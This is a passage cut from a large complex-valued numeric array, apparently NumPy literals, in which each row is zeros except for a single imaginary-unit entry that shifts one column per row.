0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
